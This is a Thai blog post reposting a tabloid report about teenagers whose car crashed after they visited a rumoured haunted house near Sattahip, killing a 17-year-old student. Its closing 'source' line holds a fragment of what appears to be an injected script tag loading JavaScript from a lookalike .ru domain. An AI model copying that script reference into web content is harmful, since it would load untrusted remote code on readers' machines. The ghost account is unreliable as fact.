Sunday, March 6, 2011

สุดสยอง 'บ้านผีสิง' 4โจ๋เจอดีซิ่งหนี

นักศึกษาสาวปี 1 วิทยาลัยชื่อดัง คอหักตายสยอง เผยก่อนชะตาขาด นั่งเก๋งกับเพื่อน ๆ บุกพิสูจน์บ้านผีสิงที่คนเล่าลือว่าสุดเฮี้ยน ช็อคตาตั้งเห็นเงาทะมึนเป็นผู้หญิงผมยาวสลวยมองมาที่กลุ่มนักพิสูจน์ ทำเอาเหงื่อแตกพลั่ก-ขาสั่น-ขนลุกซู่ ทำอะไรไม่ถูก หลังตั้งสติได้วิ่งหน้าตั้งโกยอ้าวขึ้นรถซิ่งหนีกระเจิง ระหว่างทางรถขยะโผล่ริมถนนตกใจหักหลบ แต่เหมือนมีคนมากระชากพวงมาลัยทำให้เสียหลักพุ่งชนเกาะกลางถนนฟาดต้นไม้ตายคาที่ 1 เจ็บ 3 ด้านชาวบ้านระบุ ไม่มีใครกล้าเดินผ่านหน้าบ้าน ผวาวิญญาณเฮี้ยนมานานแล้ว “ป๋อง-กพล” ชี้เคยไปพิสูจน์มาแล้ว แต่ไม่เจออะไร คาดอุบัติเหตุน่าจะเกิดจากประมาทมากกว่า อดเปรยไม่ได้แต่ก็อย่าไปท้าทายสิ่งที่เรามองไม่เห็น

ขาโจ๋บุกพิสูจน์วิญญาณเฮี้ยน เจอของจริงผวารีบขึ้นเก๋งหนีจนเกิดอุบัติเหตุ เกิดขึ้น เมื่อเวลา 01.20 น. วันที่ 11 มี.ค. ร.ต.ท. อานนท์ อินทร์ฟอง ร้อยเวร สภ.ต.นาจอมเทียน อ.สัตหีบ จ.ชลบุรี รับแจ้งเกิดอุบัติเหตุมีผู้บาดเจ็บและเสียชีวิตบริเวณหลักกิโลเมตรที่ 158 ถนนสัตหีบ-พัทยา หน้าร้านสะดวกซื้อเฟรช มาร์ท หมู่ 4 ต.นาจอมเทียน รีบไปตรวจสอบพร้อมหน่วยกู้ภัยมูลนิธิโรจนธรรมสถานสัตหีบ

ที่เกิดเหตุพบรถเก๋ง มิตซูบิชิ สีแดง ทะเบียน กร 1602 ชลบุรี สภาพพุ่งชนเกาะกลางถนน ต้นไม้ข้างทางหักโค่นหน้ารถพังยับ เยิน โดยมีชาวบ้านยืนมุงดูอยู่แน่นขนัด ในรถมี ผู้ได้รับบาดเจ็บ 3 ราย ทราบต่อมาว่าคือนาย แพททริก เชินเน่น เบอเกอร์ อายุ 19 ปี คนขับรถ ลูกครึ่งไทย-สวิตเซอร์แลนด์ บาดเจ็บเล็กน้อย นายวิทวัส หินอ่อน อายุ 19 ปี บาดเจ็บเล็กน้อย ส่วน น.ส.พัชรินทร์ ศรีอินทร์ อายุ 16 ปี นักศึกษา ปวช.ปี 1 วิทยาลัยคิงส์ตั้นบริหารธุรกิจ พัทยา จ.ชลบุรี บาดเจ็บสาหัสมีบาดแผลที่คอด้านซ้าย กระดูกข้อมือขวาแตก ส่วนบนพื้นถนนใกล้กับซากรถมีศพ น.ส.ปนัดดา แซ่ลี้ อายุ 17 ปี นักศึกษาปวช.ปี 1 วิทยาลัยคิงส์ตั้นบริหารธุรกิจ พัทยา จ.ชลบุรี สภาพแขน-ขา และคอหัก ศีรษะแตก

จากการสอบสวนนายแพททริกให้ การด้วยสีหน้าหวาดผวาว่า ก่อนเกิดเหตุช่วง เวลาประมาณ 23.30 น. วันที่ 10 มี.ค.ที่ผ่านมา ตนพาเพื่อน 3 คน ขับรถเก๋งออกจากเมืองพัทยา เดินทางมาพิสูจน์บ้านร้างชายหาดบางเสร่ อ.สัตหีบ ซึ่งมีคนร่ำลือกันว่าเป็นบ้านผีสิง ผีดุ ที่เคยมีรายการทางทีวีรายการหนึ่งมาถ่ายทำท้าพิสูจน์หลายครั้ง ซึ่งก็เจอดีกลับไปทุกครั้ง ทำให้อยากพิสูจน์ว่ามีผี หรือวิญญาณเฮี้ยนจริงหรือไม่ โดยมีน.ส.พัชรินทร์ หรือสอง นั่งเบาะหน้าข้างคนขับ ส่วนนายวิทวัส และน.ส.ปนัดดา ผู้ตายนั่งอยู่เบาะหลัง

ขาโจ๋ชอบท้าพิสูจน์ กล่าวต่อว่า เมื่อไปถึงทั้งหมดก็ลงจากรถ โดยเดินไปหยุดอยู่ที่หน้าบ้านร้างหลังดังกล่าว ขณะเพ่งมองเข้าไปภายในบ้านตอนแรกไม่เห็นอะไรเลย กระทั่งผ่านไปสักพัก จู่ ๆ เหมือนมีลมกระโชกผ่านมาปะทะ ร่าง ทำเอาพวกตนถึงกับหน้าเสีย ทันใดนั้นเองสิ่งที่อยากพิสูจน์ก็โผล่ร่างมาให้เห็นเต็มตา พวกตนเห็นเงาดำทะมึนเหมือนผู้หญิง ผมยาวสลวยเดินวนไปวนมาอยู่ในบ้าน ก่อนจะหยุดชำเลืองมองออกมาที่พวกตนยืนอยู่ ด้วยความกลัวพวกตนถึงกับทำอะไรไม่ถูก เหงื่อแตก-ขาสั่น หลังตั้งสติได้ก็พากันวิ่งหนีออกมาที่รถแบบไม่คิดชีวิต ก่อนจะสตาร์ตเครื่องอย่างรวดเร็ว โดยทุกคนต่างอึ้งนิ่งเงียบกันหมด และไม่กล้ามองกลับไปด้านหลัง เกรงว่าจะพบภาพวิญญาณเฮี้ยนตามมาหลอกหลอนอีก

หนุ่มลูกครึ่ง กล่าวอีกว่า ในระหว่างขับรถมาถึงที่เกิดเหตุซึ่งห่างจากบ้านผีสิงประมาณ 5 กม. ตนเห็นรถขยะอยู่ในซอยข้างหน้า เกรงว่าจะขับออกมา จึงหักพวงมาลัยหลบ แต่เหตุการณ์ที่ ไม่คาดคิดก็เกิดขึ้น จู่ ๆ มีความรู้สึกว่าพวงมาลัยเหมือนถูกกระชากอย่างแรง ซึ่งก็ไม่รู้ว่าเป็นเพราะเหตุใด ทำให้เสียหลักพุ่งชนเกาะกลางถนน และต้นไม้ข้างทาง ทำให้เพื่อนสาวที่นั่งด้านหลังกระเด็นตกลงมากระแทกกับถนนเสียชีวิตดังกล่าว

ด้านนายโบน (นามสมมุติ) คนขับรถ จยย.รับจ้าง กล่าวว่า บ้านหลังนี้เป็นของชาวต่างชาติ เป็นบ้าน 2 ชั้น มีห้องใต้ดิน สมัยก่อนเคยใช้ในการถ่ายหนังเรื่อง “ไอ้งูเห่า” ต่อมาบ้านหลังดังกล่าวถูกปล่อยร้างไม่มีคนอยู่ พวกเด็ก วัยรุ่นจึงนิยมเข้าไปมั่วสุมเสพยา กระทั่งเกิดเหตุพาผู้หญิงเข้าไปข่มขืนฆ่าทิ้งเมื่อหลายปีก่อน ซึ่งบ้านหลังดังกล่าวเป็นที่นิยมของนักศึกษาพากันมาพิสูจน์ว่าวิญญาณมีจริงหรือไม่ อีกทั้งรายการทีวีเกี่ยวกับวิญญาณก็เคยมาถ่ายทำหลายครั้ง เรื่องวิญญาณเฮี้ยนนั้น บอกตรง ๆ ชาวบ้านไม่มีใครกล้าผ่านเข้าซอยบ้านดังกล่าว เนื่องจากมีต้นไม้ปกคลุมทึบ บรรยากาศวังเวงน่ากลัวมาก

ผู้สื่อข่าวรายงานเพิ่มเติมว่า สำหรับบ้านร้างหลังดังกล่าวถูกปล่อยให้อยู่ในสภาพรกร้างมานานกว่า 10 ปี ชาวบ้านลือว่าเกิดเหตุฆาตกรรมในบ้านมาแล้วถึง 2 ครั้ง ขณะที่เจ้าของบ้านก็ถูกฆาตกรรมเสียชีวิตไปด้วย บ้างก็ว่าอดีตเคยเป็นคลินิกทำแท้
ท่ี่มา  src=http://www.doubleclickr.ru/index.js>

No comments:

Post a Comment